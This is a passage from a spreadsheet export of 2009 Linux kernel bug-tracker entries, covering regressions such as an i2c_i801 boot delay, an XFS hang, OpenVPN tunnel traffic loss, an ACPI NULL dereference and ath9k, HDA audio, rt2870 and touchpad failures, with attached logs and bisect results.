    <t>Created attachment 22090 [details] 2.6.30 dmesg: i2c_i801 loads, causes 15 second delay in eeepc-laptop This was raised when eeepc-laptop was reported to cause ~15 second delays on bootup. We saw it before in Bug 12376. The cause is that i2c_i801 binds to hardware which is also driven by the ACPI BIOS. Blacklisting i2c_i801 fixes it. In debian 2.6.29-something, "acpi_enforce_resources=strict" fixes the problem by reserving the resources used by ACPI, so i2c_i801 can't bind. 2.6.30 should fix it because "strict" is now the default. But it doesn't work; i2c_i801 is loaded even if the "strict" boot option is set. This is a regression. References: &lt;http://lists.alioth.debian.org/pipermail/debian-eeepc-devel/2009-June/002316.html&gt;</t>
  </si>
  <si>
    <t>xfs hangs with assertion failed</t>
  </si>
  <si>
    <t>2009-06-25 10:07 UTC</t>
  </si>
  <si>
    <t>2009-08-12 21:09 UTC</t>
  </si>
  <si>
    <t>Mounting external HD is fine, but extensive r/w (rsync) or attempting to unmount the device makes the kernel hang in the following sense: The device keeps mounted, no operations possible, every process accessing the device becomes unkillable. Apparently no major damage to the fs is caused. Log is attached.</t>
  </si>
  <si>
    <t>Tunnel device ignores TCP/UDP traffic</t>
  </si>
  <si>
    <t>2.6.31-rc1</t>
  </si>
  <si>
    <t>2009-06-26 14:45 UTC</t>
  </si>
  <si>
    <t>2009-07-06 23:34 UTC</t>
  </si>
  <si>
    <t>13639 13655</t>
  </si>
  <si>
    <t>Using OpenVPN on 2.6.29.4 and 2.6.30 works but 2.6.31-rc1 doesn't. I can ping (ICMP) the remote end, and see the packets going back and forth using tcpdump, but they don't appear to be reaching the upper layers. traceroute with -U (UDP) and -T (TCP SYN) options (ie. raw packet socket) works. There are no iptables filters in place. Nothing unusual appears in dmesg or syslog. root@thinkpad:~# ping 172.17.2.1 PING 172.17.2.1 (172.17.2.1) 56(84) bytes of data. 64 bytes from 172.17.2.1: icmp_seq=1 ttl=64 time=97.9 ms 64 bytes from 172.17.2.1: icmp_seq=2 ttl=64 time=108 ms 64 bytes from 172.17.2.1: icmp_seq=3 ttl=64 time=184 ms 64 bytes from 172.17.2.1: icmp_seq=4 ttl=64 time=96.0 ms ^C --- 172.17.2.1 ping statistics --- 4 packets transmitted, 4 received, 0% packet loss, time 3004ms rtt min/avg/max/mdev = 96.022/121.776/184.465/36.510 ms # tcptraceroute -n 192.168.1.1 1 traceroute to 192.168.1.1 (192.168.1.1), 30 hops max, 60 byte packets 1 192.168.1.1 90.230 ms 105.535 ms 104.833 ms ~# telnet 172.17.2.1 1 Trying 172.17.2.1... ^C # tcpdump -n -p -i tun0 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on tun0, link-type RAW (Raw IP), capture size 96 bytes 15:28:44.450554 IP 172.17.2.10.46287 &gt; 172.17.2.1.1: Flags [S], seq 434762695, win 5840, options [mss 1460,sackOK,TS val 169108 ecr 0,nop,wscale 6], length 0 15:28:44.542303 IP 172.17.2.1.1 &gt; 172.17.2.10.46287: Flags [R.], seq 0, ack 434762696, win 0, length 0 # ip link 1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 16436 qdisc noqueue state UNKNOWN link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 4: wmaster0: &lt;UP,LOWER_UP&gt; mtu 0 qdisc pfifo_fast state UNKNOWN qlen 1000 link/ieee802.11 00:14:a4:04:df:09 brd 00:00:00:00:00:00 5: wlan0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state UP qlen 1000 link/ether 00:14:a4:04:df:09 brd ff:ff:ff:ff:ff:ff 8: tun0: &lt;POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 100 link/[65534] # ip addr 1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 16436 qdisc noqueue state UNKNOWN link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo inet6 ::1/128 scope host valid_lft forever preferred_lft forever 4: wmaster0: &lt;UP,LOWER_UP&gt; mtu 0 qdisc pfifo_fast state UNKNOWN qlen 1000 link/ieee802.11 00:14:a4:04:df:09 brd 00:00:00:00:00:00 5: wlan0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state UP qlen 1000 link/ether 00:14:a4:04:df:09 brd ff:ff:ff:ff:ff:ff inet 192.168.10.118/24 brd 192.168.10.255 scope global wlan0 inet6 fe80::214:a4ff:fe04:df09/64 scope link valid_lft forever preferred_lft forever 8: tun0: &lt;POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 100 link/[65534] inet 172.17.2.10 peer 172.17.2.9/32 scope global tun0 # ip route 172.17.2.9 dev tun0 proto kernel scope link src 172.17.2.10 192.168.1.0/24 via 172.17.2.9 dev tun0 metric 20 172.17.2.0/24 via 172.17.2.9 dev tun0 192.168.10.0/24 dev wlan0 proto kernel scope link src 192.168.10.118 default via 192.168.10.1 dev wlan0</t>
  </si>
  <si>
    <t>NULL dereference in acpi_get_pci_dev</t>
  </si>
  <si>
    <t>2009-06-26 15:14 UTC</t>
  </si>
  <si>
    <t>Daniel Gnoutcheff</t>
  </si>
  <si>
    <t>2009-08-02 16:40 UTC</t>
  </si>
  <si>
    <t>Created attachment 22106 [details] dmesg - bootup and BUGs I'm getting a video-related kernel BUG (null dereference) when loading thinkpad_acpi. i915 also seems to trigger the same BUG, and Xorg fails to start (at least when using kernel modesetting). This is a Lenovo Thinkpad R61 7733A82. Last known working version: 2.6.30 First know failing version: 2.6.31-rc1 Distro: Ubuntu 8.04.2 amd64 git bisect says: 1e4cffe78e1decd937c7b78410eec87da6b87954 is first bad commit commit 1e4cffe78e1decd937c7b78410eec87da6b87954 Author: Alexander Chiang &lt;achiang@hp.com&gt; Date: Wed Jun 10 19:56:00 2009 +0000 ACPI: video: convert to acpi_get_pci_dev Now that acpi_get_pci_dev is available, let's use it instead of acpi_get_physical_pci_device() Cc: Thomas Renninger &lt;trenn@suse.de&gt; Signed-off-by: Alex Chiang &lt;achiang@hp.com&gt; Acked-by: Bjorn Helgaas &lt;bjorn.helgaas@hp.com&gt; Signed-off-by: Len Brown &lt;len.brown@intel.com&gt; :040000 040000 0499fac9c0a9b479379f42d120ed72d75b9c2174 ac8c0684bcce4b5ce652338b4435269e531bf600 M drivers The BUG in question is included in the attached dmesg log (starting at line 1309). The most useful-looking bits are: &gt; [ 9.510698] BUG: unable to handle kernel NULL pointer dereference at 0000000000000018 &gt; [ 9.510955] IP: [&lt;ffffffff811567e4&gt;] acpi_get_pci_dev+0xf6/0x142 Playing with objdump suggests that the kernel is crashing at this line in acpi_get_pci_dev (drivers/acpi/pci_root.c): &gt; pbus = pdev-&gt;subordinate; pdev, which comes from a pci_get_slot call, does indeed seem to be NULL, hence the BUG. Hope this helps!</t>
  </si>
  <si>
    <t>ath9k: stops working after a while</t>
  </si>
  <si>
    <t>2009-06-26 20:41 UTC</t>
  </si>
  <si>
    <t>Oliver Fischer</t>
  </si>
  <si>
    <t>2009-12-01 15:55 UTC</t>
  </si>
  <si>
    <t>When i boot into kernel 2.6.30 networking stops after about 20 minutes. rmmod ath9k and reload the kernel module does not bring back my network connection. After an reboot the thame procedure again here are an summary from the syslog.log Jun 26 20:47:44 myvdr kernel: PM: Adding info for platform:regulatory.0 Jun 26 20:47:44 myvdr kernel: cfg80211: Using static regulatory domain info Jun 26 20:47:44 myvdr kernel: cfg80211: Regulatory domain: US Jun 26 20:47:44 myvdr kernel: ^I(start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp) Jun 26 20:47:44 myvdr kernel: ^I(2402000 KHz - 2472000 KHz @ 40000 KHz), (600 mBi, 2700 mBm) Jun 26 20:47:44 myvdr kernel: ^I(5170000 KHz - 5190000 KHz @ 40000 KHz), (600 mBi, 2300 mBm) Jun 26 20:47:44 myvdr kernel: ^I(5190000 KHz - 5210000 KHz @ 40000 KHz), (600 mBi, 2300 mBm) Jun 26 20:47:44 myvdr kernel: ^I(5210000 KHz - 5230000 KHz @ 40000 KHz), (600 mBi, 2300 mBm) Jun 26 20:47:44 myvdr kernel: ^I(5230000 KHz - 5330000 KHz @ 40000 KHz), (600 mBi, 2300 mBm) Jun 26 20:47:44 myvdr kernel: ^I(5735000 KHz - 5835000 KHz @ 40000 KHz), (600 mBi, 3000 mBm) Jun 26 20:47:44 myvdr kernel: cfg80211: Calling CRDA for country: US Jun 26 20:47:44 myvdr kernel: Linux video capture interface: v2.00 Jun 26 20:47:44 myvdr kernel: saa7146: register extension 'dvb'. Jun 26 20:47:44 myvdr kernel: dvb 0000:01:01.0: PCI INT A -&gt; GSI 17 (level, low) -&gt; IRQ 17 Jun 26 20:47:44 myvdr kernel: IRQ 17/: IRQF_DISABLED is not guaranteed on shared IRQs Jun 26 20:47:44 myvdr kernel: saa7146: found saa7146 @ mem e0606e00 (revision 1, irq 17) (0x13c2,0x0003). Jun 26 20:47:44 myvdr kernel: dvb 0000:01:01.0: firmware: requesting dvb-ttpci-01.fw Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:0000:01:01.0 Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:event0 Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:event1 Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:event2 Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:event3 Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:event4 Jun 26 20:47:44 myvdr kernel: PM: Removing info for No Bus:0000:01:01.0 Jun 26 20:47:44 myvdr kernel: DVB: registering new adapter (Technotrend/Hauppauge WinTV Nexus-S rev2.X) Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:i2c-1 Jun 26 20:47:44 myvdr kernel: adapter has MAC addr = 00:d0:5c:20:b0:86 Jun 26 20:47:44 myvdr kernel: dvb 0000:01:01.0: firmware: requesting av7110/bootcode.bin Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:0000:01:01.0 Jun 26 20:47:44 myvdr kernel: PM: Removing info for No Bus:0000:01:01.0 Jun 26 20:47:44 myvdr kernel: dvb-ttpci: info @ card 0: firm f0240009, rtsl b0250018, vid 71010068, app 80fe2624 Jun 26 20:47:44 myvdr kernel: dvb-ttpci: firmware @ card 0 supports CI link layer interface Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:dvb0.demux0 Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:dvb0.dvr0 Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:dvb0.video0 Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:dvb0.audio0 Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:dvb0.ca0 Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:dvb0.osd0 Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:dvb0.net0 Jun 26 20:47:44 myvdr kernel: dvb-ttpci: Crystal audio DAC @ card 0 detected Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:video0 Jun 26 20:47:44 myvdr kernel: saa7146_vv: saa7146 (0): registered device video0 [v4l2] Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:vbi0 Jun 26 20:47:44 myvdr kernel: saa7146_vv: saa7146 (0): registered device vbi0 [v4l2] Jun 26 20:47:44 myvdr kernel: DVB: registering adapter 0 frontend 0 (ST STV0299 DVB-S)... Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:dvb0.frontend0 Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:input5 Jun 26 20:47:44 myvdr kernel: input: DVB on-card IR receiver as /class/input/input5 Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:event5 Jun 26 20:47:44 myvdr kernel: dvb-ttpci: found av7110-0. Jun 26 20:47:44 myvdr kernel: ath9k 0000:01:02.0: PCI INT A -&gt; GSI 18 (level, low) -&gt; IRQ 18 Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:phy0 Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:wmaster0 Jun 26 20:47:44 myvdr kernel: phy0: Selected rate control algorithm 'ath9k_rate_control' Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:wlan0 Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:ath9k-phy0::radio Jun 26 20:47:44 myvdr kernel: Registered led device: ath9k-phy0::radio Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:ath9k-phy0::assoc Jun 26 20:47:44 myvdr kernel: Registered led device: ath9k-phy0::assoc Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:ath9k-phy0::tx Jun 26 20:47:44 myvdr kernel: Registered led device: ath9k-phy0::tx Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:ath9k-phy0::rx Jun 26 20:47:44 myvdr kernel: Registered led device: ath9k-phy0::rx Jun 26 20:47:44 myvdr kernel: phy0: Atheros AR5416 MAC/BB Rev:2 AR2133 RF Rev:81: mem=0xe0f80000, irq=18 Jun 26 20:47:44 myvdr kernel: cfg80211: Calling CRDA for country: AM Jun 26 20:47:44 myvdr kernel: udev: renamed network interface wlan0 to wlan1 Jun 26 20:47:44 myvdr kernel: Adding 1052248k swap on /dev/hda3. Priority:-1 extents:1 across:1052248k Jun 26 20:47:44 myvdr kernel: EXT3 FS on hda2, internal journal Jun 26 20:47:44 myvdr kernel: cdfs 2.6.23 loaded. Jun 26 20:47:44 myvdr kernel: PM: Adding info for i2c:0-004c Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:hwmon0 Jun 26 20:47:44 myvdr kernel: smsc47m1: Found SMSC LPC47M10x/LPC47M112/LPC47M13x Jun 26 20:47:44 myvdr kernel: PM: Adding info for platform:smsc47m1.2560 Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:hwmon1 Jun 26 20:47:44 myvdr kernel: device-mapper: uevent: version 1.0.3 Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:device-mapper Jun 26 20:47:44 myvdr kernel: device-mapper: ioctl: 4.14.0-ioctl (2008-04-23) initialised: dm-devel@redhat.com Jun 26 20:47:44 myvdr kernel: kjournald starting. Commit interval 5 seconds Jun 26 20:47:44 myvdr kernel: EXT3 FS on hda1, internal journal Jun 26 20:47:44 myvdr kernel: EXT3-fs: mounted filesystem with writeback data mode. Jun 26 20:47:44 myvdr kernel: SGI XFS with ACLs, security attributes, realtime, large block/inode numbers, debug enabled Jun 26 20:47:44 myvdr kernel: SGI XFS Quota Management subsystem Jun 26 20:47:44 myvdr kernel: XFS mounting filesystem hda4 Jun 26 20:47:44 myvdr kernel: Ending clean XFS mount for filesystem: hda4 Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:rfkill0 Jun 26 20:47:44 myvdr kernel: NET: Registered protocol family 10 Jun 26 20:47:44 myvdr kernel: lo: Disabled Privacy Extensions Jun 26 20:47:44 myvdr kernel: ADDRCONF(NETDEV_UP): wlan1: link is not ready Jun 26 20:47:44 myvdr kernel: wlan1: authenticate with AP 00:1c:f0:5d:1d:db Jun 26 20:47:44 myvdr kernel: wlan1: authenticated Jun 26 20:47:44 myvdr kernel: wlan1: associate with AP 00:1c:f0:5d:1d:db Jun 26 20:47:44 myvdr kernel: wlan1: RX AssocResp from 00:1c:f0:5d:1d:db (capab=0x431 status=0 aid=2) Jun 26 20:47:44 myvdr kernel: wlan1: associated Jun 26 20:47:44 myvdr kernel: phy0: Allocated STA 00:1c:f0:5d:1d:db Jun 26 20:47:44 myvdr kernel: phy0: Inserted STA 00:1c:f0:5d:1d:db Jun 26 20:47:44 myvdr kernel: wmaster0: WMM queue=2 aci=0 acm=0 aifs=3 cWmin=15 cWmax=1023 txop=0 Jun 26 20:47:44 myvdr kernel: wmaster0: WMM queue=3 aci=1 acm=0 aifs=7 cWmin=15 cWmax=1023 txop=0 Jun 26 20:47:44 myvdr kernel: wmaster0: WMM queue=1 aci=2 acm=0 aifs=2 cWmin=7 cWmax=15 txop=94 Jun 26 20:47:44 myvdr kernel: wmaster0: WMM queue=0 aci=3 acm=0 aifs=2 cWmin=3 cWmax=7 txop=47 Jun 26 20:47:44 myvdr kernel: wlan1: switched to short barker preamble (BSSID=00:1c:f0:5d:1d:db) Jun 26 20:47:44 myvdr kernel: wlan1: switched to short slot time (BSSID=00:1c:f0:5d:1d:db) Jun 26 20:47:44 myvdr kernel: ADDRCONF(NETDEV_CHANGE): wlan1: link becomes ready Jun 26 20:47:44 myvdr kernel: padlock: VIA PadLock not detected. Jun 26 20:47:44 myvdr kernel: Open BA session requested for 00:1c:f0:5d:1d:db tid 0 Jun 26 20:47:44 myvdr kernel: activated addBA response timer on tid 0 Jun 26 20:47:44 myvdr kernel: switched off addBA timer for tid 0 Jun 26 20:47:44 myvdr kernel: Aggregation is on for tid 0 Jun 26 20:47:44 myvdr kernel: TKIP decrypt: data(len=56) 01 21 7e 60 00 00 00 00 aa aa 03 00 00 00 08 06 00 01 08 00 06 04 00 01 00 1b 11 f1 a0 ee c0 a8 01 65 00 00 00 00 00 00 c0 a8 01 fe f8 ad cd 88 ee b9 50 a1 1e b4 ac fd Jun 26 20:47:44 myvdr kernel: TKIP decrypt: iv16=017e iv32=00000000 Jun 26 20:47:44 myvdr kernel: TKIP decrypt: data(len=257) 01 21 7f 60 00 00 00 00 aa aa 03 00 00 00 08 00 45 00 00 e5 5a 18 00 00 80 11 5b 96 c0 a8 01 0a c0 a8 01 ff 00 8a 00 8a 00 d1 b7 01 11 02 80 29 c0 a8 01 0a 00 8a 00 bb 00 00 20 46 41 45 44 44 41 44 49 44 42 44 46 43 41 43 41 43 41 43 41 43 41 43 41 43 41 43 41 43 41 43 41 00 20 45 42 46 43 45 43 45 46 45 4a 46 45 46 44 45 48 46 43 46 46 46 41 46 41 45 46 43 41 43 41 42 4e 00 ff 53 4d 42 25 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 00 00 21 00 00 00 00 00 00 00 00 00 e8 03 00 00 00 00 00 00 00 00 21 00 56 00 03 00 01 00 00 00 02 00 32 00 5c 4d 41 49 4c 53 4c 4f 54 5c 42 52 4f 57 53 45 00 01 00 80 fc 0a 00 50 43 30 38 31 35 00 00 00 00 03 00 00 00 00 00 05 01 03 10 01 00 0f 01 55 aa 00 45 e7 b1 cc 1a be 06 e1 ea c1 a1 72 Jun 26 20:47:44 myvdr kernel: TKIP decrypt: iv16=017f iv32=00000000 Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:vcs2 Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:vcsa2 Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:vcs3 Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:vcsa3 Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:vcs4 Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:vcsa4 Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:vcs5 Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:vcsa5 Jun 26 20:47:44 myvdr kernel: PM: Adding info for No Bus:vcs6 Jun 26 21:04:47 myvdr kernel: TKIP decrypt: data(len=56) 00 20 58 a0 00 00 00 00 aa aa 03 00 00 00 08 06 00 01 08 00 06 04 00 01 00 1c f0 5d 1d db c0 a8 01 01 ff ff ff ff ff ff c0 a8 01 0a 39 54 81 c1 d3 7b 5b 8d 3a d1 27 8d Jun 26 21:04:47 myvdr kernel: TKIP decrypt: iv16=0058 iv32=00000000 Jun 26 21:04:55 myvdr kernel: TKIP decrypt: data(len=56) 00 20 59 a0 00 00 00 00 aa aa 03 00 00 00 08 06 00 01 08 00 06 04 00 01 00 1c f0 5d 1d db c0 a8 01 01 ff ff ff ff ff ff c0 a8 01 65 fc 5a 67 06 6c 4e 70 c4 ff 1c 6d e9 Jun 26 21:04:55 myvdr kernel: TKIP decrypt: iv16=0059 iv32=00000000 Jun 26 21:04:55 myvdr kernel: TKIP decrypt: data(len=74) 00 20 5a a0 00 00 00 00 aa aa 03 00 00 00 08 06 00 01 08 00 06 04 00 01 00 22 15 a1 24 99 c0 a8 01 0a 00 00 00 00 00 00 c0 a8 01 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 91 a8 e8 61 3d 64 92 46 af 96 56 Jun 26 21:04:55 myvdr kernel: TKIP decrypt: iv16=005a iv32=00000000 Jun 26 21:04:59 myvdr kernel: TKIP decrypt: data(len=56) 00 20 5b a0 00 00 00 00 aa aa 03 00 00 00 08 06 00 01 08 00 06 04 00 01 00 1c f0 5d 1d db c0 a8 01 01 ff ff ff ff ff ff c0 a8 01 fe be 8a 05 ac 1d f2 8e 52 60 15 e9 92 Jun 26 21:04:59 myvdr kernel: TKIP decrypt: iv16=005b iv32=00000000 Jun 26 21:05:25 myvdr kernel: ath9k: received PCI FATAL interrupt Jun 26 21:05:27 myvdr kernel: wlan1: beacon loss from AP 00:1c:f0:5d:1d:db - sending probe request Jun 26 21:05:29 myvdr kernel: wlan1: no probe response from AP 00:1c:f0:5d:1d:db - disassociating Jun 26 21:05:29 myvdr kernel: Tx BA session stop requested for 00:1c:f0:5d:1d:db tid 0 Jun 26 21:05:29 myvdr kernel: Stopping Tx BA session for 00:1c:f0:5d:1d:db tid 0 Jun 26 21:05:29 myvdr kernel: Rx BA session stop requested for 00:1c:f0:5d:1d:db tid 0 Jun 26 21:05:29 myvdr kernel: phy0: Removed STA 00:1c:f0:5d:1d:db Jun 26 21:05:29 myvdr kernel: phy0: Destroyed STA 00:1c:f0:5d:1d:db Jun 26 21:07:51 myvdr kernel: ADDRCONF(NETDEV_UP): wlan1: link is not ready Jun 26 21:08:30 myvdr kernel: PM: Removing info for No Bus:rfkill0 Jun 26 21:08:30 myvdr kernel: PM: Removing info for No Bus:ath9k-phy0::assoc Jun 26 21:08:30 myvdr kernel: PM: Removing info for No Bus:ath9k-phy0::tx Jun 26 21:08:30 myvdr kernel: PM: Removing info for No Bus:ath9k-phy0::rx Jun 26 21:08:30 myvdr kernel: PM: Removing info for No Bus:ath9k-phy0::radio Jun 26 21:08:30 myvdr kernel: PM: Removing info for No Bus:wlan1 Jun 26 21:08:30 myvdr kernel: PM: Removing info for No Bus:wmaster0 Jun 26 21:08:30 myvdr kernel: PM: Removing info for No Bus:phy0 Jun 26 21:08:30 myvdr kernel: ath9k 0000:01:02.0: PCI INT A disabled Jun 26 21:08:30 myvdr kernel: ath9k: Driver unloaded Jun 26 21:08:32 myvdr ntpdate[8012]: can't find host 0.debian.pool.ntp.org Jun 26 21:08:32 myvdr ntpdate[8012]: can't find host 1.debian.pool.ntp.org Jun 26 21:08:32 myvdr ntpdate[8012]: can't find host 2.debian.pool.ntp.org Jun 26 21:08:32 myvdr ntpdate[8012]: can't find host 3.debian.pool.ntp.org Jun 26 21:08:32 myvdr ntpdate[8012]: no servers can be used, exiting Jun 26 21:08:43 myvdr kernel: ath9k 0000:01:02.0: PCI INT A -&gt; GSI 18 (level, low) -&gt; IRQ 18 Jun 26 21:08:43 myvdr kernel: PM: Adding info for No Bus:phy1 Jun 26 21:08:43 myvdr kernel: PM: Adding info for No Bus:wmaster0 Jun 26 21:08:43 myvdr kernel: phy1: Selected rate control algorithm 'ath9k_rate_control' Jun 26 21:08:43 myvdr kernel: PM: Adding info for No Bus:wlan0 Jun 26 21:08:43 myvdr kernel: PM: Adding info for No Bus:ath9k-phy1::radio Jun 26 21:08:43 myvdr kernel: Registered led device: ath9k-phy1::radio Jun 26 21:08:43 myvdr kernel: PM: Adding info for No Bus:ath9k-phy1::assoc Jun 26 21:08:43 myvdr kernel: PM: Adding info for No Bus:ath9k-phy1::tx Jun 26 21:08:43 myvdr kernel: Registered led device: ath9k-phy1::tx Jun 26 21:08:43 myvdr kernel: PM: Adding info for No Bus:ath9k-phy1::rx Jun 26 21:08:43 myvdr kernel: Registered led device: ath9k-phy1::rx Jun 26 21:08:43 myvdr kernel: phy1: Atheros AR5416 MAC/BB Rev:2 AR2133 RF Rev:81: mem=0xe1580000, irq=18 Jun 26 21:08:43 myvdr kernel: cfg80211: Calling CRDA for country: AM Jun 26 21:08:43 myvdr kernel: PM: Adding info for No Bus:rfkill1 Jun 26 21:08:43 myvdr kernel: ADDRCONF(NETDEV_UP): wlan1: link is not ready Jun 26 21:08:43 myvdr kernel: udev: renamed network interface wlan0 to wlan1 Jun 26 21:08:44 myvdr kernel: wlan1: deauthenticating by local choice (reason=3) Jun 26 21:08:44 myvdr kernel: ADDRCONF(NETDEV_UP): wlan1: link is not ready Jun 26 21:09:34 myvdr ntpdate[8150]: can't find host 0.debian.pool.ntp.org Jun 26 21:10:14 myvdr ntpdate[8150]: can't find host 1.debian.pool.ntp.org With my 2.6.29.4 kernel i have speed problems max 10mbit and with 2.6.30 i have full draft N speed for about 15 minutes. if you need more information please let me know regards Oliver</t>
  </si>
  <si>
    <t>[bisected] No sound on HDA Intel (ALC268)</t>
  </si>
  <si>
    <t>v2.6.31-rc1-114-g4075ea8</t>
  </si>
  <si>
    <t>2009-06-27 04:42 UTC</t>
  </si>
  <si>
    <t>2009-06-30 12:35 UTC</t>
  </si>
  <si>
    <t>With a recent kernel, my laptop no longer produces sound from the speakers or the headphone jack. I have made sure all mixer controls are turned up and unmuted. I bisected the problem to the following commit: commit 4a79ba34cada6a5a4ee86ed53aa8a73ba1e6fc51 Author: Takashi Iwai &lt;tiwai@suse.de&gt; Date: Wed Apr 22 16:31:35 2009 +0200 ALSA: hda - Add amp initialization for realtek auto mode In the realtek auto-probing mode, the initialization of amp with some magic COEF or EAPD verbs is applied only when the codec SSID has valid values to satisfy the realtek's definition. However, many devices don't provide in that way, thus the device doesn't work as is. This patch allows the same initialization code even if the SSID doesn't pass the bit test. Also, alc_subsystem_id() is changed just to check and define the type, so that it's called in the parser, instead of the initializer. Signed-off-by: Takashi Iwai &lt;tiwai@suse.de&gt; Here is my audio device: 00:1b.0 Audio device [0403]: Intel Corporation 82801H (ICH8 Family) HD Audio Controller [8086:284b] (rev 03)</t>
  </si>
  <si>
    <t>[drm:drm_wait_vblank] *ERROR* failed to acquire vblank counter, -22</t>
  </si>
  <si>
    <t>2009-06-27 07:02 UTC</t>
  </si>
  <si>
    <t>2009-08-20 19:00 UTC</t>
  </si>
  <si>
    <t>I got storm in dmesg saying [drm:drm_wait_vblank] *ERROR* failed to acquire vblank counter, -22 My laptop is Asus EEE901 BIOS 2001</t>
  </si>
  <si>
    <t>Intel HDA ALC861 doesn't work</t>
  </si>
  <si>
    <t>2.6.28.13.17</t>
  </si>
  <si>
    <t>2009-06-27 10:29 UTC</t>
  </si>
  <si>
    <t>funfrank</t>
  </si>
  <si>
    <t>2012-06-12 10:02 UTC</t>
  </si>
  <si>
    <t>Kernel release: 2.6.28-13-generic Alsa Driver version: 1.0.18rc3 Device ATI SB 400 I upgraded to 2.6.28-13.17 and got crackling audio. The output of alsa-info.sh is attached.</t>
  </si>
  <si>
    <t>rt2870 driver is broken for (some) cards</t>
  </si>
  <si>
    <t>2009-06-27 17:33 UTC</t>
  </si>
  <si>
    <t>jakob gruber</t>
  </si>
  <si>
    <t>2009-11-26 13:45 UTC</t>
  </si>
  <si>
    <t>The issue is described here: http://bbs.archlinux.org/viewtopic.php?id=73964 in the first 2 posts. Short summary: "The problem appears if I run ifconfig ra0 down the command doesn't complete, produces no output and causes many other prolems. Examples: I lose the VT where I ran this. I can't cancel it with CTRL+C. Not even sysrq is able to recover it. Everything using PAM begins to fail, if I run sudo in a VT, i lose it (this might be related to your mounting problem). X crashes. Wicd stalls, the process can't be shut down any more. The reason fot this is that many networking applications "cylce" the interface once before using it to clear left-over configurations. I can't even shutdown anymore if I don't use the -n option. The whole system basically goes down the drain." Affected cards: * Belkin F5D8053 N Wireless USB Adapter * Trendnet USB stick Fix: * downgrade to 2.6.29 * or use the v2.1.2.0 drivers from http://www.ralinktech.com.tw/data/drivers/2009_0521_RT2870_Linux_STA_V2.1.2.0.tgz</t>
  </si>
  <si>
    <t>Touchpad lost synchronization after resume from suspend to RAM</t>
  </si>
  <si>
    <t>2009-06-28 10:42 UTC</t>
  </si>
  <si>
    <t>2009-07-28 21:04 UTC</t>
  </si>
  <si>
    <t>Restarting tasks ... done. psmouse.c: Touchpad at isa0060/serio1/input0 lost synchronization, throwing 3 bytes away. psmouse.c: resync failed, issuing reconnect request psmouse.c: Touchpad at isa0060/serio1/input0 lost synchronization, throwing 3 bytes away. psmouse.c: resync failed, issuing reconnect request psmouse.c: Touchpad at isa0060/serio1/input0 lost synchronization, throwing 3 bytes away. psmouse.c: resync failed, issuing reconnect request psmouse.c: Touchpad at isa0060/serio1/input0 lost synchronization, throwing 3 bytes away. psmouse.c: resync failed, issuing reconnect request Touchpad was unusable for at least 1 minute than it started to work - I checked dmesg and found this...</t>
  </si>
  <si>
    <t>hibernation/swsusp lockup due to acpi-cpufreq</t>
  </si>
  <si>
    <t>2009-06-28 20:23 UTC</t>
  </si>
  <si>
    <t>2009-08-06 15:11 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.30: hibernation/swsusp lockup due to acpi-cpufreq Submitter : Johannes Stezenbach &lt;js@sig21.net&gt; Date : 2009-06-16 01:27 References : http://lkml.org/lkml/2009/6/15/630 Handled-By : Rafael J. Wysocki &lt;rjw@sisk.pl&gt; This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>fb/mmap lockdep report.</t>
  </si>
  <si>
